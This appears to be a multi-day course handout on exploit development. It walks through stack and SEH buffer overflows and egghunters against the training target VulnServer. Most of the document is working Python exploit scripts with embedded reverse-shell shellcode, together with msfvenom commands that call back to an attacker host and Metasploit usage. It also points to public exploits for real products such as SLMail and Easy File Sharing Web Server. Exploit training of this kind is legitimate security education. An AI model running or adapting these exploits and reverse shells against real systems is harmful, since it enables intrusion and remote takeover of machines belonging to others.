New Exploit Development 2018

############################
# Exploit Development 2018 #
############################


#######################
# VMs for this course #
#######################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
    username: workshop
    password: password

https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts

You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).


#######################################################
# Files you may find helpful for learning Exploit Dev #
#######################################################
https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
--------------------------------------------------------------------------

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.


------------------------------

---------------------------Type This-----------------------------------


cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb    (paste the code into this file)


cd ~/toolz/metasploit

./msfconsole


use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST CHANGEME-TO-YOUR-WIN7-IP
set RPORT 9999
exploit
-----------------------------------------------------------------------

-----------------------------------------------------------------------------------
Day 1 Homework:
Watch the following videos and take notes for questions tomorrow.

http://www.securitytube.net/video/1389
http://www.securitytube.net/video/1398
http://www.securitytube.net/video/1399


-----------------------------------------------------------------------------------------------------------------------

#########
# Day 2 #
#########

********************************************************
* Vulnserver – GMON command SEH based overflow exploit *
********************************************************

-  GMON command has a vulnerability, too, however this vulnerability is SEH based. The proof of concept python script:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket

characters = 'A' * 5050


expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send('GMON /.:/' + characters)
expl.close()

--------------------------------------------------------------

1. Identify the position of EIP. When the application crashes, select View/SEH chain.

2. As it can be seen, the SE handler is overwritten with A characters. Create a pattern with the Metasploit  tool, update the script and send the buffer to the application.

3. Calculate offset (From here the offset is 3519)

4. Update python script:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


buffer = 'GMON /.:/' + 'A' * 3519 + '\x42\x42\x42\x42' + 'C' * (5050 - 3519 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

--------------------------------------------------------------

5. Crash the application with the updated script. The offset seems to correct.

6. Check bad characters - Update Python script to check bad characters:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


chars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = 'GMON /.:/' + 'A' * (3519 - len(chars)) + chars + '\x42\x42\x42\x42' + 'C' * (5050 - 3519 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

--------------------------------------------------------------

- I placed the characters after the four B, but it did not trigger SEH based overflow. Then I placed them before the four B. The characters looks good. The only bad character is the zero.

7. Find address for EIP:

- In case of SEH based overflow, we have two important things to remember. The first one is that there are some protection against SEH and not all module is appropriate. There is an OllyDbg plugin which lists modules whether it contains SEH protection or not. The plugin can be downloaded from here: http://www.openrce.org/downloads/details/244/OllySSEH
- The DLL should be copied next to the OllyDbg exe. Then a new submenu will appear in the plugin menu. (SafeSEH OFF)

- There are two modules which were not compiled with SEH protection. The address of vulnserver.exe contains zero character, so that it is not appropriate for us. The other module is essfunc.dll and it might be good.

- In  case of buffer overflow, we have to find a JMP os CALL instruction. In case of SEH overflow, we have to find a sequence of instructions, POP-POP-RET. The structure of the SEH contains three values on the stack. The first and second POP removes the first two values. The third instruction is the RET. As the third value is the EIP, the RET instruction will move it into EIP.

- In  order to find a sequence of values in OllyDbg, open the essfunc.dll module, right click on the code and select Search for/All sequences. In the dialog box, type the following:

POP r32
POP r32
RETN

- Select one of the addresses and double click on it. Copy the selected into the script.


--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys

# 625011B3 POP-POP-RET from essfunc.dll

buffer = 'GMON /.:/' + 'A' * 3519 + '\xb3\x11\x50\x62' + 'C' * (5050 - 3519 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

--------------------------------------------------------------

8.  First stage payload


- Let us crash the application with this updated script and see, what the SE handler isl.

      # 625011B3 POP-POP-RET from essfunc.dll

- Place a breakpoint on the address (Select it and press F2) and press Shift + F9. Then go through the POP-POP-RET instructions (press F7 three times). We stop 4 bytes before the EIP address.

- Four bytes is not too much. We can jump here to somewhere else. A short jump is only two bytes. Let us jump after the EIP. Jump to the point where the buffer, which contains the 0x43 bytes, starts. The other two bytes can be filled with NOPs.

     # 017BFFC4   EB 06            JMP SHORT 017BFFCC

- This JMP instruction can be considered as the first stage payload.


9. Second stage payload

- After we execute the JMP instructions, we have just a few bytes to execute (from 0174FFCB to 0174FFFF, this is only 34 bytes). There are lot of space in the As buffer, before the EIP address. We can place the reverse shell payload there and jump there from here somehow. The reverse shell can be considered as a third stage payload, and the code, which jumps to it, is the second stage payload.

- One possible solution is to get the EIP with a trick, subtract some value from it and jump to that address. The assembly code of this trick:

second_stage.asm

------------------------------------------------
global _start

_start:

fldz
fnstenv [esp-12]
pop ecx
add cl, 10
nop

dec ch		; ecx=-256;
dec ch		; ecx=-256;
jmp ecx		; lets jmp ecx (current location - 512)

-------------------------------------------------

- Let us place this code in the Cs buffer and the reverse shell payload into the As buffer. The reverse shell payload should be placed next to the EIP address and the characters should be NOP instructions.

- The structure of the buffer:

  NOP instructions | Reverse Shell payload | Short JMP | NOP | NOP | EIP | Second Stage payload

# shellcode:  ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.243.166 LPORT=4449 -b "\x00" -f c EXITFUNC=thread

- The first version of exploit:

--------------------------Code--------------------------------

import socket
import os
import sys

buf = ("\xbb\xd4\x42\x7c\xae\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x5a\x0e\x03\x8e\x4c\x9e\x5b\xd2\xb9\xdc"
"\xa4\x2a\x3a\x81\x2d\xcf\x0b\x81\x4a\x84\x3c\x31\x18\xc8\xb0"
"\xba\x4c\xf8\x43\xce\x58\x0f\xe3\x65\xbf\x3e\xf4\xd6\x83\x21"
"\x76\x25\xd0\x81\x47\xe6\x25\xc0\x80\x1b\xc7\x90\x59\x57\x7a"
"\x04\xed\x2d\x47\xaf\xbd\xa0\xcf\x4c\x75\xc2\xfe\xc3\x0d\x9d"
"\x20\xe2\xc2\x95\x68\xfc\x07\x93\x23\x77\xf3\x6f\xb2\x51\xcd"
"\x90\x19\x9c\xe1\x62\x63\xd9\xc6\x9c\x16\x13\x35\x20\x21\xe0"
"\x47\xfe\xa4\xf2\xe0\x75\x1e\xde\x11\x59\xf9\x95\x1e\x16\x8d"
"\xf1\x02\xa9\x42\x8a\x3f\x22\x65\x5c\xb6\x70\x42\x78\x92\x23"
"\xeb\xd9\x7e\x85\x14\x39\x21\x7a\xb1\x32\xcc\x6f\xc8\x19\x99"
"\x5c\xe1\xa1\x59\xcb\x72\xd2\x6b\x54\x29\x7c\xc0\x1d\xf7\x7b"
"\x27\x34\x4f\x13\xd6\xb7\xb0\x3a\x1d\xe3\xe0\x54\xb4\x8c\x6a"
"\xa4\x39\x59\x3c\xf4\x95\x32\xfd\xa4\x55\xe3\x95\xae\x59\xdc"
"\x86\xd1\xb3\x75\x2c\x28\x54\xba\x19\xc1\x02\x52\x58\x25\x5a"
"\xc2\xd5\xc3\x36\x14\xb0\x5c\xaf\x8d\x99\x16\x4e\x51\x34\x53"
"\x50\xd9\xbb\xa4\x1f\x2a\xb1\xb6\xc8\xda\x8c\xe4\x5f\xe4\x3a"
"\x80\x3c\x77\xa1\x50\x4a\x64\x7e\x07\x1b\x5a\x77\xcd\xb1\xc5"
"\x21\xf3\x4b\x93\x0a\xb7\x97\x60\x94\x36\x55\xdc\xb2\x28\xa3"
"\xdd\xfe\x1c\x7b\x88\xa8\xca\x3d\x62\x1b\xa4\x97\xd9\xf5\x20"
"\x61\x12\xc6\x36\x6e\x7f\xb0\xd6\xdf\xd6\x85\xe9\xd0\xbe\x01"
"\x92\x0c\x5f\xed\x49\x95\x7f\x0c\x5b\xe0\x17\x89\x0e\x49\x7a"
"\x2a\xe5\x8e\x83\xa9\x0f\x6f\x70\xb1\x7a\x6a\x3c\x75\x97\x06"
"\x2d\x10\x97\xb5\x4e\x31")

# 625011B3 POP-POP-RET from essfunc.dll

# 017BFFC4   EB 06            JMP SHORT 017BFFCC

first_stage = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"

buffer = "GMON /.:/" + "\x90" * (3515 - len(buf)) + buf + "\xeb\x06\x90\x90" + "\xb3\x11\x50\x62" + first_stage + "C" * (5050 - 3519 - 4 - len(first_stage))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

-------------------------------------------------------------

- The other possible solution is if we use an egghunter. The egghunter is a small code which searches the Virtual Address Space for a certain pattern and if it finds the pattern, then it starts to execute the code after the pattern. The pattern is four byte long. In order to avoid finding the pattern in the egghunter, the four byte should be repeated twice.

- The structure of the buffer:

   NOP instructions | EGG | EGG | Reverse Shell payload | Short JMP | NOP | NOP | EIP | Egghunter

# shellcode:  ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.243.166 LPORT=4449 -b "\x00" -f c EXITFUNC=thread

- The second version of exploit:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


buf = ("\xbb\xd4\x42\x7c\xae\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x5a\x0e\x03\x8e\x4c\x9e\x5b\xd2\xb9\xdc"
"\xa4\x2a\x3a\x81\x2d\xcf\x0b\x81\x4a\x84\x3c\x31\x18\xc8\xb0"
"\xba\x4c\xf8\x43\xce\x58\x0f\xe3\x65\xbf\x3e\xf4\xd6\x83\x21"
"\x76\x25\xd0\x81\x47\xe6\x25\xc0\x80\x1b\xc7\x90\x59\x57\x7a"
"\x04\xed\x2d\x47\xaf\xbd\xa0\xcf\x4c\x75\xc2\xfe\xc3\x0d\x9d"
"\x20\xe2\xc2\x95\x68\xfc\x07\x93\x23\x77\xf3\x6f\xb2\x51\xcd"
"\x90\x19\x9c\xe1\x62\x63\xd9\xc6\x9c\x16\x13\x35\x20\x21\xe0"
"\x47\xfe\xa4\xf2\xe0\x75\x1e\xde\x11\x59\xf9\x95\x1e\x16\x8d"
"\xf1\x02\xa9\x42\x8a\x3f\x22\x65\x5c\xb6\x70\x42\x78\x92\x23"
"\xeb\xd9\x7e\x85\x14\x39\x21\x7a\xb1\x32\xcc\x6f\xc8\x19\x99"
"\x5c\xe1\xa1\x59\xcb\x72\xd2\x6b\x54\x29\x7c\xc0\x1d\xf7\x7b"
"\x27\x34\x4f\x13\xd6\xb7\xb0\x3a\x1d\xe3\xe0\x54\xb4\x8c\x6a"
"\xa4\x39\x59\x3c\xf4\x95\x32\xfd\xa4\x55\xe3\x95\xae\x59\xdc"
"\x86\xd1\xb3\x75\x2c\x28\x54\xba\x19\xc1\x02\x52\x58\x25\x5a"
"\xc2\xd5\xc3\x36\x14\xb0\x5c\xaf\x8d\x99\x16\x4e\x51\x34\x53"
"\x50\xd9\xbb\xa4\x1f\x2a\xb1\xb6\xc8\xda\x8c\xe4\x5f\xe4\x3a"
"\x80\x3c\x77\xa1\x50\x4a\x64\x7e\x07\x1b\x5a\x77\xcd\xb1\xc5"
"\x21\xf3\x4b\x93\x0a\xb7\x97\x60\x94\x36\x55\xdc\xb2\x28\xa3"
"\xdd\xfe\x1c\x7b\x88\xa8\xca\x3d\x62\x1b\xa4\x97\xd9\xf5\x20"
"\x61\x12\xc6\x36\x6e\x7f\xb0\xd6\xdf\xd6\x85\xe9\xd0\xbe\x01"
"\x92\x0c\x5f\xed\x49\x95\x7f\x0c\x5b\xe0\x17\x89\x0e\x49\x7a"
"\x2a\xe5\x8e\x83\xa9\x0f\x6f\x70\xb1\x7a\x6a\x3c\x75\x97\x06"
"\x2d\x10\x97\xb5\x4e\x31")

# 625011B3 POP-POP-RET from essfunc.dll

# 017BFFC4   EB 06            JMP SHORT 017BFFCC

first_stage = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

egg = "\x54\x30\x30\x57"	# 0x57303054

buffer = "GMON /.:/" + "\x90" * (3515 - 4 - 4 - len(buf)) + egg + egg + buf + "\xeb\x06\x90\x90" + "\xb3\x11\x50\x62" + first_stage + "C" * (5050 - 3519 - 4 - len(first_stage))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

---------------------------------------------------------------


Today, let's work on the Konica Minolta SEH overwrite. You can look at the public exploit code, and download the target vulnerable application from here:
https://www.exploit-db.com/exploits/39215/

You can download the attack scripts from today from here:
https://s3.amazonaws.com/infosecaddictsfiles/2018-Exploit-Dev.zip


Quick challenge:
Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.


Day 2 Homework:
Watch the following videos and take notes for questions tomorrow.
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


-----------------------------------------------------------------------------------------------------------------------

#########
# Day 3 #
#########

*****************************************************
* Vulnserver – KSTET command exploit with egghunter *
*****************************************************

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


buffer = "KSTET /.:/" + "A" * 5011

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

-------------------------------------------------------------

- The value of EIP is 0x41414141. It is overwritten with our As. It is a simple buffer overflow exploit.

- However only 90 A characters are in the memory.

- This place is too small for a reverse shell, but enough for an egghunter. The egghunter is a small code which searches for a unique pattern (the egg) in the memory, and if it finds the pattern, the egghunter starts to execute the code after the unique pattern.

- The exploit development steps are the same as in the previous cases:

1. We have to find the offset from where the EIP is overwritten.
2. Then we have to find an address. In our case JMP ESP is a good candidate as the ESP points into the middle of the As buffer.
3. We have 20 byte to jump to the beginning of the As buffer.
4. The egghunter should be placed right after the ‘KSTET /.:/’.
5. The reverse shell should be placed somehow into the memory with the egg.

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


# 62501205 from essfunc.dll	JMP ESP

buffer = "KSTET /.:/" + "A" * 66 + "\x05\x12\x50\x62" + "C" * (5011 - 66 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

--------------------------------------------------------------

1. Jump backward
- We have 20 bytes to jump backward. (The 0x43 part of the memory.)

- The hex code of JMP SHORT instruction is 0xeb. The second byte tells us, how many bytes to jump. If this byte is lower than 0x80, it jumps forward. If the value is greater than or equal with 0x80, it jumps backward. Obviously it can jump no more than 127 byte.

- We do not need to know the code if we use OllyDbg. Simply double click on the 0178f9e0 line and write in the box JMP SHORT and the address of the position where it should jump.

 - Great! The two hex codes are 0xeb and 0xb8. Update the script with them and also add the egghunter code to it.

- The updated code:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


# 62501205 from essfunc.dll	JMP ESP

# eb b8		jmp short

buffer = "KSTET /.:/" + egghunter + "\xCC" * (66 - len(egghunter)) + "\x05\x12\x50\x62" + "\xeb\xb8" + "C" * (5011 - 66 - 4 - 2)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

-------------------------------------------------------------


2. Place shellcode with egghunter into the memory

- We have a few command we can send to VulnServer. One of them might be good for our purpose and keeps the shellcode in memory. We update our code, so that it sends a command with a parameter, where the parameter is our shellcode with the egg. Then we send the KSTET command with our crafted buffer. When the buffer overflow is triggered, we search the memory for the egg. If we find it, then the command is good. This is a trial and error process.

- GDOG command keeps the passed parameter in the memory. The updated shellcode:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


shellcode =  ""
shellcode += "\xdb\xd1\xd9\x74\x24\xf4\x5a\x2b\xc9\xbd\x0e\x55\xbd"
shellcode += "\x38\xb1\x52\x31\x6a\x17\x83\xc2\x04\x03\x64\x46\x5f"
shellcode += "\xcd\x84\x80\x1d\x2e\x74\x51\x42\xa6\x91\x60\x42\xdc"
shellcode += "\xd2\xd3\x72\x96\xb6\xdf\xf9\xfa\x22\x6b\x8f\xd2\x45"
shellcode += "\xdc\x3a\x05\x68\xdd\x17\x75\xeb\x5d\x6a\xaa\xcb\x5c"
shellcode += "\xa5\xbf\x0a\x98\xd8\x32\x5e\x71\x96\xe1\x4e\xf6\xe2"
shellcode += "\x39\xe5\x44\xe2\x39\x1a\x1c\x05\x6b\x8d\x16\x5c\xab"
shellcode += "\x2c\xfa\xd4\xe2\x36\x1f\xd0\xbd\xcd\xeb\xae\x3f\x07"
shellcode += "\x22\x4e\x93\x66\x8a\xbd\xed\xaf\x2d\x5e\x98\xd9\x4d"
shellcode += "\xe3\x9b\x1e\x2f\x3f\x29\x84\x97\xb4\x89\x60\x29\x18"
shellcode += "\x4f\xe3\x25\xd5\x1b\xab\x29\xe8\xc8\xc0\x56\x61\xef"
shellcode += "\x06\xdf\x31\xd4\x82\xbb\xe2\x75\x93\x61\x44\x89\xc3"
shellcode += "\xc9\x39\x2f\x88\xe4\x2e\x42\xd3\x60\x82\x6f\xeb\x70"
shellcode += "\x8c\xf8\x98\x42\x13\x53\x36\xef\xdc\x7d\xc1\x10\xf7"
shellcode += "\x3a\x5d\xef\xf8\x3a\x74\x34\xac\x6a\xee\x9d\xcd\xe0"
shellcode += "\xee\x22\x18\xa6\xbe\x8c\xf3\x07\x6e\x6d\xa4\xef\x64"
shellcode += "\x62\x9b\x10\x87\xa8\xb4\xbb\x72\x3b\x7b\x93\x7e\x39"
shellcode += "\x13\xe6\x7e\x2c\xb8\x6f\x98\x24\x50\x26\x33\xd1\xc9"
shellcode += "\x63\xcf\x40\x15\xbe\xaa\x43\x9d\x4d\x4b\x0d\x56\x3b"
shellcode += "\x5f\xfa\x96\x76\x3d\xad\xa9\xac\x29\x31\x3b\x2b\xa9"
shellcode += "\x3c\x20\xe4\xfe\x69\x96\xfd\x6a\x84\x81\x57\x88\x55"
shellcode += "\x57\x9f\x08\x82\xa4\x1e\x91\x47\x90\x04\x81\x91\x19"
shellcode += "\x01\xf5\x4d\x4c\xdf\xa3\x2b\x26\x91\x1d\xe2\x95\x7b"
shellcode += "\xc9\x73\xd6\xbb\x8f\x7b\x33\x4a\x6f\xcd\xea\x0b\x90"
shellcode += "\xe2\x7a\x9c\xe9\x1e\x1b\x63\x20\x9b\x2b\x2e\x68\x8a"
shellcode += "\xa3\xf7\xf9\x8e\xa9\x07\xd4\xcd\xd7\x8b\xdc\xad\x23"
shellcode += "\x93\x95\xa8\x68\x13\x46\xc1\xe1\xf6\x68\x76\x01\xd3"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

egg = "\x54\x30\x30\x57"	# 0x57303054


# 62501205 from essfunc.dll	JMP ESP

# eb b8		jmp short

buffer = "KSTET /.:/" + egghunter + "\xCC" * (66 - len(egghunter)) + "\x05\x12\x50\x62" + "\xeb\xb8" + "C" * (5011 - 66 - 4 - 2)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)

expl.send("GDOG " + egg + egg + shellcode)
expl.recv(1024)

expl.send(buffer)
expl.close()

--------------------------------------------------------------


- The memory can be searched in OllyDbg for a pattern. The memory where the our egg code resides


You can download the attack scripts from today from here:


Quick challenge:
Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.


#########
# Day 4 #
#########

*****************************************************
* Vulnserver – HTER command buffer overflow exploit *
*****************************************************

- HTER command of VulnServer has a vulnerability. Let us try to create an exploit for this vulnerability.


- The PoC python script:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys

buffer = "HTER " + "A" * 2106

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

------------------------------------------------------------

- The script sends A characters. However the EIP is overwritten with 0xAAAAAAAA, instead of 0x41414141.

- It seems our buffer is somehow converted into hex byte array. Let us make a test, send a byte which contains 0123456789abcdef twice and check it in the memory. The buffer:

   buffer = “HTER ” + “0123456789abcdef0123456789abcdef” + “A” * 2106


- Our hypothesis seems to correct, however the first “0” character was removed. Let us change “HTER” to “HTER 0“. Now the shellcode can be appended right after this string.


1. Identify the position of EIP

- We cannot use the Metasploit module, because the buffer is converted and it would not work. We have to use a different method. We can send a crafted buffer which contains only 0-9 and a-f characters and check the EIP. I use the same PoC script and only show you how the buffer is created.

- The first iteration:

buffer = “HTER 0”

buffer += “1” * 200
buffer += “2” * 200
buffer += “3” * 200
buffer += “4” * 200
buffer += “5” * 200
buffer += “6” * 200
buffer += “7” * 200
buffer += “8” * 200
buffer += “9” * 200
buffer += “a” * 200
buffer += “b” * 200
buffer += “c” * 200

The value of EIP: BBBBBBBB. Great! The position of RET value is after 2000 byte.


- The second iteration:

buffer = “HTER 0” + “A” * 2000

buffer += “1” * 20
buffer += “2” * 20
buffer += “3” * 20
buffer += “4” * 20
buffer += “5” * 20
buffer += “6” * 20
buffer += “7” * 20
buffer += “8” * 20
buffer += “9” * 20
buffer += “a” * 20

The value of EIP: 33333333. Great! The position of RET value is after 2040 byte.


- The third iteration:

buffer = “HTER 0” + “A” * 2040

buffer += “1” * 2
buffer += “2” * 2
buffer += “3” * 2
buffer += “4” * 2
buffer += “5” * 2
buffer += “6” * 2
buffer += “7” * 2
buffer += “8” * 2
buffer += “9” * 2
buffer += “a” * 2

- The value of EIP: 44332211. Great! We found the position of the bytes which will be written into EIP.


- Test it with the following script:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


buffer = "HTER 0" + "A" * 2040 + "42424242" + "A" * (4106 - 1 - 2040 - 8)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

-------------------------------------------------------------


- The value of EIP: 42424242. It works fine! We can control the EIP register.


2. Find value for EIP

- The EAX register points to the beginning of our buffer, which starts after the “HTER 0” string. Find a JMP EAX value and update the script. Do not forget, that the address should be in reverse order. Place a breakpoint to the JMP EAX address and check whether the breakpoint is hit.

- It works fine again. The final step is to add for example a reverse shell payload to the exploit.


3. Add shellcode to the exploit

Generate a shellcode with venom and add it to the script.

--------------------------Type this--------------------------------

msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.2.130 LPORT=4444 > shellcode.bin
-------------------------------------------------------------------

Hex values can be displayed with hexdump:

--------------------------Type this--------------------------------

hexdump -C shellcode.bin
-------------------------------------------------------------------

- This will however not trigger the vulnerability. What is the problem? The shellcode must not contain double zero string (“00”)! Let us generate the shellcode again, but add -b ‘\x00’ to the parameter list of msfvenom.

--------------------------Type this--------------------------------
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.2.130 LPORT=4444 -b ‘\x00’ > shellcode.bin
-------------------------------------------------------------------


- Msfvenom uses shikata_ga_nai encoder automaticaly, because we specified bad characters with the -b option. The final shellcode size is 351 byte. Add it to the script and test it

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


shellcode = (
"bec9d8bc2cd9eed97424f45f2bc9b152"
"83c70431770e03bed65ed9bc0f1c223c"
"d041aad9e141c8aa52729afe5ef9ceea"
"d58fc61d5d2531105e160133dc655693"
"dda5abd21adb4686f397f53677edc5bd"
"cbe34d229b027ff5975c5ff474d5d6ee"
"99d0a1856aae334fa34f9fae0ba2e1f7"
"ac5d9401cfe0afd6ad3e25cc16b49d28"
"a6197bbba4d60fe3a8e9dc98d562e34e"
"5c30c04a04e269cbe045950b4b393340"
"662e4e0bef8363b3ef8bf4c0dd14af4e"
"6edc698991f7ce056cf82e0cabac7e26"
"1acd14b6a318bae60bf37b56eca313bc"
"e39c04bf29b5af3aba7a8746b813da46"
"adbf53a0a72f327b50c91ff7c1168a72"
"c19d39838c553797799602c52ca9b861"
"b2382771bd20f026ea9709a20681a3d0"
"da578b5001a41259c490304910187d3d"
"cc4f2bebaa399d4565957701f0d54757"
"fd333eb74cea07c8617a80b19f1a6f68"
"242a3a300da3e3a10fae131c53d79794"
"2c2c87dd29680f0e40e1fa30f7022f"
)

# 77DB0BCD from ntdll.dll

buffer = "HTER 0" + shellcode + "A" * (2040 - len(shellcode)) + "CD0BDB77" + "A" * (4106 - 1 - 2040 - 8)

